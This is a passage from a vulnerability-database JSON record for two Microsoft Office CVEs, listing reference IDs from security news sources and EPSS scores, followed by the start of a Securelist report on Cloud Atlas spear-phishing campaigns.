"idList": ["SECURELIST:03923D895F0F0B7EB3A51F48002D1416", "SECURELIST:0EC04669D1B4F9900C7ED36BB8AFB1A2", "SECURELIST:11665FFD7075FB9D59316195101DE894", "SECURELIST:163368D119719D834280EA969EDB785D", "SECURELIST:1670EF82924C5F24DC777CBD3BA4AE5E", "SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "SECURELIST:2E379BD626ECA8E38B18EDCA6CD22F3C", "SECURELIST:322E7EEAE549CDB14513C2EDB141B8BA", "SECURELIST:375240F06A95008FE7F1C49E97EEC5AF", "SECURELIST:3DB11A5605F77743FA5F931DF816A83C", "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "SECURELIST:45BAFC60F3E2EFDD0D35C99D042559B4", "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "SECURELIST:4A1162E18E20A1A1E0F057FE02B3AE75", "SECURELIST:53EC9FA168E0493828018AA0C1B799C0", "SECURELIST:5F58A2B6A05CED1E343735029CE88CC2", "SECURELIST:652E2EF2009E38562770BCAC629BEA2E", "SECURELIST:73735B62C781261398E44FFF82262BCD", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:833C831E498502BB46DD03F0C6F4D597", "SECURELIST:934E8AA177A27150B87EC15F920BF350", "SECURELIST:967D8B65D5D554FFB5B46411F654A78A", "SECURELIST:9B6F07B15AEDE81CE353FC4D91FF6329", "SECURELIST:9CEE13B3A189B3DBB187C6946786F480", "SECURELIST:A2A995C1C898D3DA4DB008FBA6AA149E", "SECURELIST:A3CEAF1114E104F14254F7AF77D7D080", "SECURELIST:A4072107882E39592149B0DB12585D70", "SECURELIST:A9EBC6A1BD7D7A743024BD012EAC8323", "SECURELIST:AFE852637D783B450E3C6DA74A37A5AB", "SECURELIST:B7116025A4E34CF6B9FED5843F7CDCD4", "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48", "SECURELIST:CE954DA57A5EE857B62F0E00D36A5003", "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "SECURELIST:DA58D4888BE428D1D0C529B16E07E85D", "SECURELIST:E9DB961C0B1E8B26B305F963059D717E", "SECURELIST:F1FC61836DCAA7F1E27411092B208523", "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D"]}, {"type": "symantec", "idList": ["SMNTC-101757", "SMNTC-102347"]}, {"type": "talosblog", "idList": ["TALOSBLOG:3E4DED1D580BBFDD5A456042C03F6483", "TALOSBLOG:5AED45D6F563E6F048D9FCACECC650CC", "TALOSBLOG:7F660B8BF6BF1461DC91FBA38C034D9A", "TALOSBLOG:809E263C085A7EC5D9424905C6E4ACA8", "TALOSBLOG:906482C918479D3D0C5D654DF6CC9FED", "TALOSBLOG:9F3650D77DE88BE04EFECD8F54CE0BE1", "TALOSBLOG:A69C35FFFCE6FA744216C7784C7D2148", "TALOSBLOG:C840FAF5403868E1730CD6FB8F3F09E6", "TALOSBLOG:CDA48DA087B7839DDC1F8E0F4281D325", "TALOSBLOG:D034163DF19149D9BA90463DA51A05F9", "TALOSBLOG:E17B2B34420CA9C9A1CD5E1FE7980D8C", "TALOSBLOG:EC1B279A70AF41A51CBB4EB4722EFA46", "TALOSBLOG:FAB75C531A83C576A2D8274490FF6114"]}, {"type": "thn", "idList": ["THN:125A440CBDB25270B696C1CCC246BEA1", "THN:3A9F075C981951FC8C86768D0EF1794A", "THN:42E3306FC75881CF8EBD30FA8291FF29", "THN:7489F5CF1C31FDAC5F67F700D5DDCD5B", "THN:75586AE52D0AAF674F942498C96A2F6A", "THN:81AA37DC2B87520CB02F3508EF82AABD", "THN:8EAD85C313EF85BE8D38BAAD851B106E", "THN:96CCD36932DBF3F5BEFCC18D4EC4E5C2", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:C21D17F1D92C12B031AB9C761BBD004A", "THN:C473C49BA4C68CD048FB1E0B4A2D04F4", "THN:CBEFDC179819629DFFC0C17341BFD3E8", "THN:DADA9CB340C28F942D085928B22B103F", "THN:E50F78394BCAE6FF3B8EE8482A81A3C4", "THN:ED087560040A02BCB1F68DE406A7F577", "THN:FBCEC8F0CE0D3932FE4C315878C48403"]}, {"type": "threatpost", "idList": ["THREATPOST:00E7F3B203C0A059EA3AE42EEFDA4BF6", "THREATPOST:01085CB521431ED10FF25B00357004A0", "THREATPOST:011D33BB13274F4BC8AF713F8EBEC140", "THREATPOST:0234DE925A24BDFF85D569B0592C4E40", "THREATPOST:0273E2F0D7B4CECA41893B066B3C2D24", "THREATPOST:027F94626186E3644FA6008B6B65879D", "THREATPOST:02A26476FD54111CFB779DB36CA0BE95", "THREATPOST:037D55F658239A9DBF47BABD04D1F6E7", "THREATPOST:03F3C45744F6C52E1687C208288C7001", "THREATPOST:04738138B50414CEACDB62EFA6D61789", "THREATPOST:04FAA050D643AD8D61D8063D5232A682", "THREATPOST:051AFF295EB4024C33B9C6988E0F5C34", "THREATPOST:05856E5CAEC60A0E16D4618496270D44", "THREATPOST:05A74488EF15AE2BEA20C34AC753FB10", "THREATPOST:05CA5F0BEDE4AEE08ED1C40F6D413601", "THREATPOST:06F9A4BBE673BFFA63BB435F99387C6D", "THREATPOST:07E70978E087406E6779D5EE8D2D372D", "THREATPOST:088C4C91495F7C7262D861A66DC74B85", "THREATPOST:0A40F95A480060B254A1AA6FCF9504B2", "THREATPOST:0ACA8133652DA5D5C5D027A4F9EED75A", "THREATPOST:0B64A7C04FF47971B650E17B53C45FD2", "THREATPOST:0BA7B2FCC73EB6AA27E7D15318D8DCEF", "THREATPOST:0C5877DE6DD50B0CB309505FAE7076AC", "THREATPOST:0D250E6E576E1C05274E04DB1BB79529", "THREATPOST:0DD2574E8237EB5925DD5C2AC8B9A426", "THREATPOST:0E875F36B37069C0CA4DC570FE3BD197", "THREATPOST:0ECD1B8BDCF9CD65F10B363FC3FDABA9", "THREATPOST:0F2DE86E0069A54E56B0694DA999399A", "THREATPOST:0FEEF48E09B4F6AB583220AF2A1CCE70", "THREATPOST:105BBC66E564BD98581E52653F5EA865", "THREATPOST:1071D90B9DDF02B6FC796EE160E0AFDD", "THREATPOST:11053DD231ACA5F34708B38E7E96AE9F", "THREATPOST:1109584452DBA30B86EF68E3277D4E39", "THREATPOST:11A212CE63E0ED8390DF014E511EC174", "THREATPOST:1256E9A9997A1C51E9DB7AEB7A420D3D", "THREATPOST:1327F2449E675DB6F1F90EDB766B1DC8", "THREATPOST:14171FFFDCB402F0E392DA20B23E7B5A", "THREATPOST:14B2B02CB661C8C7E1BC1204495F0D25", "THREATPOST:14FF20625850B129B7F957E8393339F1", "THREATPOST:1663F2C868E9B0A3184989EAF71EB3DA", "THREATPOST:17ABCE7BEBAC56FCA5601686C9601728", "THREATPOST:17AC167B3F04D3043199819655CB5EB8", "THREATPOST:195656DFCDBB1B18C4B0E899AA2C96DE", "THREATPOST:19F6727A0DB5ECAEB57AFC56191A2EC4", "THREATPOST:1B56CE326878B69FFA20FFC20DB62365", "THREATPOST:1B75EB23D874C5D85DA6FEAB65007B4E", "THREATPOST:1BC8168472B040DAEF3D3D5CCC865068", "THREATPOST:1BCC479A05BA19E3B4906CB5F5FD2F1B", "THREATPOST:1C5C89106D8897D6CDDFF572948A779A", "THREATPOST:1D743B7D5397A9D33A091396D1D95BDB", "THREATPOST:1E11FA7540C2CE7C48832A342FAAB3A8", "THREATPOST:1F7B99C76055BD44C266432644E6B9CB", "THREATPOST:1FA77776DEE21633617B7B927000ADBF", "THREATPOST:1FB92D9630590CC17FF00234FF9991FF", "THREATPOST:1FDD4D6EFB350CC9F6F42A5514AA6849", "THREATPOST:20A9D9F111F89A61A6242B788FCF6209", "THREATPOST:212ACE7085CC094D6542F00AF0A4D1B4", "THREATPOST:21439BDD06D57894E0142A06D59463B5", "THREATPOST:215398BCE165265631436077B4E79ECB", "THREATPOST:222B126A673B8B22370D386B699A7F90", "THREATPOST:247A5639B207C2C522F735B0C3412087", "THREATPOST:26EDD0A7C1914DBF0CFE32B0877BE5A7", "THREATPOST:270516BE92D218A333101B23448C3ED3", "THREATPOST:27F2EB604A7262CA0448D6463BA3B2A4", "THREATPOST:27F8092D2D7E88CBD23EAF8A7A016E24", "THREATPOST:28D790372A5C9EB1083AA78A4FDF3C0E", "THREATPOST:28E43852D5120A3EC8F4720244E0C432", "THREATPOST:29E9543F6EC7903A34D286C6F4391368", "THREATPOST:2A42363A8B070949A25091DE7946F5A2", "THREATPOST:2AFE9BC25DD41D9CF073C8C04B0B1879", "THREATPOST:2C798ED7D1CE36B13D82410EA1C94D9F", "THREATPOST:2CE017994C889322A1BF0C3F3521DFD7", "THREATPOST:2D616CF8D8ED2AEB6805F098560269CB", "THREATPOST:2DAD0426512A1257D3D75569F282640E", "THREATPOST:2E13C5A3F37F020F188FBBE61F9209BC", "THREATPOST:2F3319136B672CD9E6AB9A17CE42DF1B", "THREATPOST:30DA1C9D6157103537A72208FA5F0B5D", "THREATPOST:30F4296B03191B6F9433E5DFA9CEBFE6", "THREATPOST:326CCB6EA4E28611AD98B1964CFEE88E", "THREATPOST:3283173A16F1E86892491D89F2E307C2", "THREATPOST:334259E5C4B157E6AC8ADC754BD30D4F", "THREATPOST:35BD4DEE5D1763F5788A6BD1F6AEB00D", "THREATPOST:370DCA5103923FA8965F6D8890D4198F", "THREATPOST:37854AF8C9A75E43ACA98BD95205B6BC", "THREATPOST:379EB96BF0EAF29DD5D3B3140DEF25F5", "THREATPOST:384A1D8040B61120BE2BA529493B9871", "THREATPOST:392CE26C2E3587A54C58FBEC0E26729F", "THREATPOST:3973FA851D33322A013EA1314A1AACC7", "THREATPOST:3AADA643D0F6F1FA8E04B9E2C9F0354B", "THREATPOST:3B27D34858D1F6DE1183C9ABEE8643CD", "THREATPOST:3BA8475F97E24074B27812B9B24AD05F", "THREATPOST:3BDDDA913AECAA168F2B8059EF6BF25A", "THREATPOST:3D0B017E262134B8D61E195735411E8A", "THREATPOST:3D30F37EC2CC17D6C3D6882CF7F9777E", "THREATPOST:3D7F98274EE0CEFF5B22DA72598BE24B", "THREATPOST:3E3C8752E39F7A8CA5DD91BD283A79E7", "THREATPOST:3F9DD13AA9EC2148FD8D14BD00233287", "THREATPOST:40C7024941C4F0096D439BD79BF49C6D", "THREATPOST:415E19FC1402E6223871B55143D39C98", "THREATPOST:42533F5A68FABB4F312743C2E2A1262A", "THREATPOST:426AA248C0C594BAA81FC6B16FD74B7F", "THREATPOST:42FDB1238D348C4F4A1074DB3091E6F2", "THREATPOST:43B03902EBB289EABEA3B61E32BF7B7B", "THREATPOST:43C7C5989C2358091F5FA33D11480AEB", "THREATPOST:43EF6CEDCAE06DF2760527AA36C42994", "THREATPOST:44C6EDF349E9D3038D1847321D79E4DF", "THREATPOST:44C93D75841336281571380C5E523A23", "THREATPOST:44FF4D429457B43FB0FEA96C9A0DE58C", "THREATPOST:45A8572FB3BCE9303EDEE2A4783994E3", "THREATPOST:4622EF32C9940819EDA248FBC9C1F722", "THREATPOST:483C67752109A3C6AF1920AEA0F63B4C", "THREATPOST:49045E816279C72FD35E91BF5F87387C", "THREATPOST:490FB5EEC7306F4AF2F0990C85BAB0EC", "THREATPOST:49E24C3D272F18F81C1E207E97168C33", "THREATPOST:4A51D32AF6E154B536858044A8667E45", "THREATPOST:4AB3E2B46281B3DB5FFB51D8F16A11EC", "THREATPOST:4ABC0C904122EBC91D19E8F502931126", "THREATPOST:4AFBF9284A6902E941BE6D95BCD2052E", "THREATPOST:4BAED737182ECF19718520A7258DFDAA", "THREATPOST:4C1556375D297ECC5389073B3ECC185E", "THREATPOST:4C788DAABFE70AE1D1483D4039B3767E", "THREATPOST:4D225F38F43559CB340E0C0C20E1C9BD", "THREATPOST:4DF584EB3FA47CA6245D964EA2A1A2FB", "THREATPOST:4E345D523AA3EF8D5D06880D1063B0C6", "THREATPOST:4F6F13C74BC6E5EC3C5FF0600F339C90", "THREATPOST:4FA617D4BE1CFDFB912E254229B94E61", "THREATPOST:5083983BB9656C8F9FD41E7297B634C9", "THREATPOST:5170E663982119D9A7AA4064EC71D01D", "THREATPOST:5196DBE4ABD34424DF1F07ED3DA73B12", "THREATPOST:519B278A52BA4200692386F6FAEA43B1", "THREATPOST:519EDC580FCA347C035738F51DB2ABE3", "THREATPOST:51AB3DBBFBFCA1EDCCB83FCECB47C07B", "THREATPOST:5223DD87C6EE62FB7C3723BCCF670612", "THREATPOST:537857B2E29A08953D50AC9EDE93162F", "THREATPOST:537A21C79E24E9981AD8200320B7D46F", "THREATPOST:542C0B0D14A54FEF96D5035E5ABEFEDF", "THREATPOST:55583CEEB1DA64162FA6CCA7B37CB1BB", "THREATPOST:55873F60362AA114632D0D7DC95FF63C", "THREATPOST:5679ACC257BEC35A3A300F76FA78E8E6", "THREATPOST:580280FBECF50DF8FF68F3A998F311D3", "THREATPOST:59732F848538CA26FD0A3AC638F529F9", "THREATPOST:59C4483705849ADA19D341EFA462DD19", "THREATPOST:5A63035EF0BF190E58422B3612EB679F", "THREATPOST:5B1F1A9A61354738E396D81C42C0E897", "THREATPOST:5BA927C1BD88B4949BDAEC1ACC841488", "THREATPOST:5C4C4351A746ADF8A7F1B2D316888C01", "THREATPOST:5C60BA94DEDFC24233F8B820C7D23076", "THREATPOST:5D03FA1B3C642C5317FB96AFA476DDFA", "THREATPOST:5D9785F30280BD09EB7E645CA2EECE79", "THREATPOST:5DA1737F4321D42086053820C84CCFB0", "THREATPOST:5E4874778A3B5A26CF2755C59BA3A7A8", "THREATPOST:616358A88F9C1E69920585FDC717CF1F", "THREATPOST:619AA46DE90E000F02F634A9AA0FB8B0", "THREATPOST:61AC6ABD7798785567FFEEBEF573CDF8", "THREATPOST:61F350907297E5B2EBAE56FF04C054C7", "THREATPOST:6232FE8F8C59D8BBBD6CD0EAAD3D4AA3", "THREATPOST:63188D8C89FE469962D4F460E46755BC", "THREATPOST:632A7F4B404E8A9E7D49A4895D573FDB", "THREATPOST:639050E94B84AD3926F64EF305F67AB4", "THREATPOST:63EC8A47C53B47DB10146ABB77728483", "THREATPOST:6456A6FCBD57F31DF6ECF8310230973D", "THREATPOST:64EE7E2569B19CDBC1F2000D27D9FC06", "THREATPOST:65B7931A3E49BA24F11CA0CB09743AEA", "THREATPOST:66D2F7851992FD5FC9934A5FE7A68E9F", "THREATPOST:68D1078BB418B06D989E65C3972EDE28", "THREATPOST:6968030EBEDCF665121F267E466D3BA5", "THREATPOST:69A935F9472525B2FDE94FC33D6C6B70", "THREATPOST:6B8C9E983349C1AA69D5488866DAAC1D", "THREATPOST:6B96C89C11F9A7363A1E592863892D36", "THREATPOST:6C3F577E27FFC413E4196C31436CE13A", "THREATPOST:6C50260122AE142A1AA28DCFDE4EA98B", "THREATPOST:6CF438E98DFFF4B4057CAFB1382A4D3C", "THREATPOST:6E19885760DF8E9DD66B4F30158CD173", "THREATPOST:6E270592F88355DEABA14BF404C7EDDE", "THREATPOST:6E2DD8B76555337B1AB3A01AE147EA68", "THREATPOST:6E46A05627B4B870228F4C53DD7811AE", "THREATPOST:6EBEA4CC58A28C7B7DEE65B4D6FDA976", "THREATPOST:70B08FC40DE9224ACE3D689EE22897C0", "THREATPOST:714DD68C5B32F675D9C75A67D7288B65", "THREATPOST:71D015FE251ED550B92792FF72430841", "THREATPOST:738BF7215D8F472D205FCBD28D6068E5", "THREATPOST:742E793D712CB6B2F049DBEA5373016E", "THREATPOST:75108516B2230B2FA175C2B84083F4DF", "THREATPOST:752864660896CF677AF67798E68952F0", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:7642BB12A1C6458D5DDB7202B6BF1D62", "THREATPOST:765141925BCF61E1BEC4EA2E7E28C380", "THREATPOST:769E9696F176FD575D7F365CA771EFC3", "THREATPOST:77E27FE5A07B4C4146B818CE438E0AAA", "THREATPOST:78B8BC1F232A077BA4B03580A37C0780", "THREATPOST:78CC95FFED89068ABD2CBA57EFE1D5F8", "THREATPOST:7957677E374E9980D5154F756D4A2E00", "THREATPOST:7A640DBB2223135AD8DC65457AB55EBF", "THREATPOST:7ACEE8004906A83F73EF46D8EE9A83F3", "THREATPOST:7BE818C547990FA7A643DE9C0DE99C8C", "THREATPOST:7D0B88F224FD59AB5C49F030B02A25D9", "THREATPOST:7D2F975F60C58181C3B6726E809F10FD", "THREATPOST:7D30EC4B25275AFBC409D8619D125E65", "THREATPOST:7D43FDAB0FB38B20FBB86FFF6FD31270", "THREATPOST:7E30033E60118E5B4B8C14689A890155", "THREATPOST:7E324E4AFB9218DCC9509FB4E2277400", "THREATPOST:7F4C76F7EC1CB91B3A37DE64274F1EC3", "THREATPOST:7F86D903184A4B5AF689693F5950FB7D", "THREATPOST:7FF462EBFF86BEB1E7C8207D6CB07E50", "THREATPOST:7FFF8255C6708C32B41A2B0FBFEBA9B0", "THREATPOST:80110ABE631D4720D6EECA161FFCE965", "THREATPOST:80978215EBC2D47937D2F3471707A073", "THREATPOST:809BED35A98A53099CE1EC723FA950F2", "THREATPOST:80D12F3888B999E484D206D5EBA9EEA0", "THREATPOST:828471E05035E11C0ED67C67E1EA8F0D", "THREATPOST:848870C5AD3BB637321291CEF571A5F9", "THREATPOST:8549E725CF51C109F7299A0CC5FACBE9", "THREATPOST:856DD01A5D951BB0E39AE06B64DDD2A7", "THREATPOST:85DCC5523A4DCF507633F07B43FE638A", "THREATPOST:85DEC97DDAF4F3EBF731C2724329904B", "THREATPOST:8836AC81C1F2D9654424EC1584E50A16", "THREATPOST:88A5449B2DE22E7A3AD1C820BEDE1109", "THREATPOST:8A24910206DA1810DAD81ABA313E33A7", "THREATPOST:8BA8EF04040D5048287D9AFFAD778130", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:8D91C617AB6DA9813465DF309507F9F5", "THREATPOST:8E01B2E26F588D0FA5B0857DCEF926DA", "THREATPOST:8EC1069E3114E28911EA3438DA21B952", "THREATPOST:8F39618B0CB625A1C4FC439D0A7C4EB9", "THREATPOST:8FAA8C7C7378C070F0011A0B44C03726", "THREATPOST:8FACBD9A4509F71E19E07BB451FD68A0", "THREATPOST:90355E85731E1618F6C63A58CD426966", "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "THREATPOST:945830C59DF62627CC3D29C4F9E9139F", "THREATPOST:945A12FF5F8B6420706F2E174B6D0590", "THREATPOST:95C6723464FA4BDF541640AC24DD5E35", "THREATPOST:967CD2B765C5CD02EC0568E4797AF842", "THREATPOST:96B85F971B8102B581B91984548004F2", "THREATPOST:96C5FAF7B7238F498D3BFD523344AA56", "THREATPOST:9758835CBD1761636E1E39F36A79936B", "THREATPOST:9812AA10EEA208EA87CD37C5F28D927F", "THREATPOST:985009AC9680D632153D78707A8949EF", "THREATPOST:98BE42759F35CD829E6BD3FAC7D5D1D5", "THREATPOST:9A9D21304DF605E55290BEAB2BDF62C5", "THREATPOST:9AA382E93ED0C2124DD69CF4DDC84EB7", "THREATPOST:9AE8698D8AABA0F11676A29CECC6D7BA", "THREATPOST:9B11E0EF22481CA407924C58E8C7F8C1", "THREATPOST:9B936E81D7DD33C962D98A85BAF3B7FE", "THREATPOST:9C03EBE552C67EF6E62604A81CF13C1A", "THREATPOST:9C0FA678FF748B08478CA83EAAEF83B4", "THREATPOST:9D048A14622014274EB5C5D19FEDD46A", "THREATPOST:9DAD31CF008CF12C5C4A4EA19C77BB66", "THREATPOST:9E1DE5C0DB7F1D8747AD52E14E4C8387", "THREATPOST:9FE968913EDA58B2C622DFD4433C05E0", "THREATPOST:A054939E56572665B8DD31C2FF1D6A79", "THREATPOST:A0EA2808DE56569B593A4E0254EC09CD", "THREATPOST:A1A03F8D19A1212209F2765F29BE892C", "THREATPOST:A21BD1B60411A9861212745052E23AE7", "THREATPOST:A29172A6F4C253F7A464F05CCE4E3ABB", "THREATPOST:A2C4DFB7FD998E1990946FBDE70D8050", "THREATPOST:A2FCDF5F534EC09A258F3193FDEA41A8", "THREATPOST:A3218B82F449C5905D1957A1C264C1C1", "THREATPOST:A45F038EA4091EC6AC414522EC7B04B6", "THREATPOST:A60A7647981BC9789CAECE6E9BADD30E", "THREATPOST:A653527FBB893B6568AF6B264422BD7A", "THREATPOST:A6CEBF30D4D0B3B54DC8E78CC21EBA4B", "THREATPOST:A7710EFC5AA842A252861C862A3F8318", "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "THREATPOST:A7D014F320A68BD2D7BEA7FCB9349FC0", "THREATPOST:A824AE46654142C5CE71C8DDFD90D548", "THREATPOST:A844D1411E7339911EECDDBD5596A9E7", "THREATPOST:A959F2AFFE1161A65066EACCFB0D5FCA", "THREATPOST:A9E6DBBE61D0494D0B0C83151FEC45D0", "THREATPOST:A9EF092F5BA25CAD6C775AAE60BC318E", "THREATPOST:A9FAA9D15FCD97151072CF8CE16A42D9", "THREATPOST:AA7C9EFD06F74FBC5580C0384A39AA56", "THREATPOST:AB80E18E0D0B4D9D91D9BF01EFBE3AC6", "THREATPOST:ABA04F8289071D7B10CAE4202D0EB18E", "THREATPOST:AC7105820BB83340E9C002EE77D4B8D6", "THREATPOST:AD20F9744EB0E2E4D282F681451B4FBD", "THREATPOST:AD3C2C361C6E263CA6B217D740D6C09F", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:AD96628DA2614402CC9BDEF93704870B", "THREATPOST:AE4AEC18802953FE366542717C056064", "THREATPOST:AE6ADD184BCB4B6C0DCF53BEE513E9DD", "THREATPOST:AFCEAC73B5337D8E7C237914CF84FC01", "THREATPOST:B051AFA0F0705404F1CD22704980AE7F", "THREATPOST:B1F3641CBE3AF60ECA85E3ADE7AE53CA", "THREATPOST:B2352D090C3E08DD00F192FB220C5B99", "THREATPOST:B34044D3D29EE756187C0D5CDF2E19B8", "THREATPOST:B3C0097CBA4C334709D99BB9D477A6DD", "THREATPOST:B450AFC35B78A62F536227C18B77CB4E", "THREATPOST:B4579714760429B9531FF0E79E44C578", "THREATPOST:B4AED814955E51C42BAE9BF0A3A014B0", "THREATPOST:B4B23ADD1522DC53A0B05300F439AB03", "THREATPOST:B5B59F74FDFACADB44DBF4AE420E3189", "THREATPOST:B60886BC4FD09BD02903BB2C7FBD4A35", "THREATPOST:B62AA49BBB410F8D7406ABE4E3C4C62F", "THREATPOST:B64BFE4F560527B57D4157D27CF3E553", "THREATPOST:B71BC1DE86D81D6B48969567186B0622", "THREATPOST:B7280795B2A42655BE9618D06EB9520A", "THREATPOST:B7E1238E416DAB5F50EED6E4CC347296", "THREATPOST:B8B49658F96D885BA4DC80406A2A94B3", "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", "THREATPOST:BB432D74FB2DC755C74CBEE5CF71B1E9", "THREATPOST:BB95F65906A69148A31A208D15B5EFC3", "THREATPOST:BD9CDF08D7870033C1C564691CABFC16", "THREATPOST:BDA1752A66AD0D3CF8AB59CFB7A8F472", "THREATPOST:BDAFE3A8671CEAB24C02FF18A8FBA60F", "THREATPOST:BDE4A24DFC0713FBC25AB0F17931717C", "THREATPOST:BE68C6E4335F8D5EEAEFCE1E8553C4C8", "THREATPOST:BF3CD27D3018BF7BD8E93D42325DAA73", "THREATPOST:C1850156F9F2124BACDC7601CCFA6B30", "THREATPOST:C35731BF3D4A3F8D0B1A838FAD1A8832", "THREATPOST:C442C6ABA3916CAA62C89BC2CB6332CD", "THREATPOST:C47E4314F4EEB30F0139DF3BC8B47E01", "THREATPOST:C4DD63E36CE4313386CAB54222BDD07A", "THREATPOST:C56525805A371C56B68CE54AB4EDB9AF", "THREATPOST:C5D967CF7CFD8422FD9ACFC1CF7277A6", "THREATPOST:C8BB08507CBCCE4C217C33C15D3AA04D", "THREATPOST:C9B3ABEF738D9A1E524FB94613BA5CBA", "THREATPOST:C9C5B1554A6F4216A73108C0748E16EF", "THREATPOST:CB62075A4B035B08FDA602FF702FBB71", "THREATPOST:CC82779FBE47FD3E64708FE6233C3DAD", "THREATPOST:CDCABD1108763209B391D5B81AE03CF7", "THREATPOST:CDDC2C11CF6377AB44508254B9FB36DA", "THREATPOST:D053D0BAA76AC62C5AFCB77CBFD61B6D", "THREATPOST:D11D4E32822220251B14068F9BAAD17E", "THREATPOST:D292185F5E299FDB7366DDAA750D6070", "THREATPOST:D3F6B40A3A2EF494FE7F0AFC7768F7CD", "THREATPOST:D40D286C87360AFDC61FCD9AD506D78F", "THREATPOST:D49075D6FFF077A542015B7F806F4E27", "THREATPOST:D4C8CD7D146990740B8339D88A3FDB84", "THREATPOST:D55054CEF7EC85590BCAC2F18EED6FFC", "THREATPOST:D587192A5DA9FB1680FF9D453F96B972", "THREATPOST:D58796CB8261B361ADF389131F955AE3", "THREATPOST:D5CE687F92766745C002851DFA8945DE", "THREATPOST:D6D859A31F73B00E9B6F642D4C89B344", "THREATPOST:D8172FCB461F5843B3391B2336A4D02F", "THREATPOST:D8CDE16C2F1722831D3106563D1F1551", "THREATPOST:D9C08A737D3D95BFF6B07A04C9479C6D", "THREATPOST:DC3489917B7B9C6C1824FB61C05E82CD", "THREATPOST:DC91E1B2D30C1A0D1ED78420E79DCE86", "THREATPOST:DCEC8DA2CC98CD3F9DF8B10773BD6F01", "THREATPOST:DD69574508B1751B9C9B01C26AE809C1", "THREATPOST:DD7A2F272ACFDE71B0A0CEC234C35876", "THREATPOST:DDDE126E49EC98A6A15655F564E25620", "THREATPOST:DEDA9E6DCA21010A215B158BFF80253C", "THREATPOST:DF45F7CBB6E670440E0A14E517EA753D", "THREATPOST:DF54323828EEC1DDCE4B2312AC6F085F", "THREATPOST:E067CFBFA163616683563A8ED34648FE", "THREATPOST:E068C231265847BA99669A8EBF0D395D", "THREATPOST:E22E26BB31C17ACCC98C59076AF88CD7", "THREATPOST:E46805A1822D16B4725517D4B8786F57", "THREATPOST:E4FBCA31AB2D69F0292283738E873960", "THREATPOST:E539817E8025A93279C63158F37F2DFB", "THREATPOST:E65917E5AE555B95E6FFBD69E00E682D", "THREATPOST:E6DC1F407BA6CEE26FE38C95EBB10D7A", "THREATPOST:E77302403616F2E9A6C7DA2AD2B1F880", "THREATPOST:E7C5C8276111C637456F053327590E4C", "THREATPOST:E937B281CB0B5D1061AAD253FA4ACB53", "THREATPOST:EC55500DAF9E1467C9C94C82758F810C", "THREATPOST:ED7B090DD1289553529F8B6FD87BF467", "THREATPOST:EE14785AC189E016FD2CE51464D3643D", "THREATPOST:EE5FF4DE95B4AED68C90DCB6444B6560", "THREATPOST:EF7DCA1CE0B1A1B1D93B4E4F7A3A3163", "THREATPOST:EF898143DB86CE46FFBDC81DCD8E79AA", "THREATPOST:EFE8A853C0EEF9ED023CC92349BE9410", "THREATPOST:F158248C80174DD4B29AE26B4B4139C0", "THREATPOST:F19F70E263B2C3D2A16C72D12F9884FC", "THREATPOST:F1E0D1BF5C51CAA730D94DB196D962D1", "THREATPOST:F261FA3F1DECA361A6DBC169065B1101", "THREATPOST:F28846A403C73C488A77B766A21BB3E5", "THREATPOST:F2BB55148C9EC48C94C05B4B2CBBBC1A", "THREATPOST:F514D796FE42C0629BD951D8664A2420", "THREATPOST:F61F8A6168C36EAB1584BC8044080B35", "THREATPOST:F68D705DC9A7663E4BF22574470F51D7", "THREATPOST:F701F7503777655BB413FCBEFB88C8DE", "THREATPOST:F73CA4042B0D13ED4A29DED46F90E099", "THREATPOST:F8AE6E328FD84A15442D0329003F9E9B", "THREATPOST:F9FEB3F0862AAD4CC618F9737F44FA7B", "THREATPOST:FAE0DDDC6420E9881C1D719E13B77095", "THREATPOST:FB6C6CE8F3B4AE6846C8AB866C36F024", "THREATPOST:FBDE9552D48B698542D65DEA64890566", "THREATPOST:FBF1F4B1FB26C8B1E95965E920F985EF", "THREATPOST:FCB99D1A395F7D2D1BFD9F698321FA04", "THREATPOST:FCF1B008BD9B10ADDA0703FDB9CBAA04", "THREATPOST:FD699B5CBB882E8FB3DDF3341B557D27", "THREATPOST:FEAE151B1861BE9EF40E606D5434AE00", "THREATPOST:FFB8302BEBD76DDACC5FD08D3FF8F883"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:1FEAB54A2EB3929007298481113A7219", "TRENDMICROBLOG:3D0DF0AC0B5B6A3B4D80A495AF488F03", "TRENDMICROBLOG:6A0454A8A4891A1004496709868EC034"]}, {"type": "zdt", "idList": ["1337DAY-ID-29022", "1337DAY-ID-29119"]}]}, "exploitation": null, "score": {"value": -0.0, "vector": "NONE"}, "epss": [{"cve": "CVE-2017-11882", "epss": "0.974500000", "percentile": "0.998970000", "modified": "2023-03-17"}, {"cve": "CVE-2018-0802", "epss": "0.974870000", "percentile": "0.999430000", "modified": "2023-03-17"}], "vulnersScore": -0.0}, "_state": {"dependencies": 1660032824, "score": 1660035404, "epss": 1679178262}, "_internal": {"score_hash": "073b4c64a66be2d73a8eb732625a82e2"}}

{"securelist": [{"lastseen": "2019-08-12T19:33:22", "description": "\n\nAlso known as Inception, Cloud Atlas is an actor that has a long history of cyber-espionage operations targeting industries and governmental entities. We first reported [Cloud Atlas in 2014](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>) and we've been following its activities ever since.\n\nFrom the beginning of 2019 until July, we have been able to identify different spear-phishing campaigns related to this threat actor mostly focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/09151317/Recent-Cloud-Atlas-activity-1.png>)\n\n**Countries targeted by Cloud Atlas recently**\n\nCloud Atlas hasn't changed its TTPs (Tactic Tools and Procedures) since 2018 and is still relying on its effective existing tactics and malware in order to compromise high value targets.\n\nThe Windows branch of the 